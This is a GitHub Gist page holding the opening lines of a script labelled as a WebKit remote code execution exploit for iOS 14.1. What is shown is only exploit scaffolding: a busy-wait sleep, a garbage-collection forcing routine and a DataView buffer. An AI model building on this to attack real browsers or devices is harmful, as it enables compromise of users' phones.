Skip to content

Instantly share code, notes, and snippets.

View MichelePipi's full-sized avatar
🎯
Chat is this real

Michele MichelePipi

🎯
Chat is this real
View GitHub Profile
@MichelePipi
MichelePipi / fuck.js
Created May 22, 2021 04:49 — forked from ujin5/fuck.js
WebKit RCE on ios 14.1
function sleep( sleepDuration ){
var now = new Date().getTime();
while(new Date().getTime() < now + sleepDuration){ /* do nothing */ }
}
function gc() {
for (let i = 0; i < 0x10; i++) {
new ArrayBuffer(0x1000000);
}
}
let data_view = new DataView(new ArrayBuffer(8));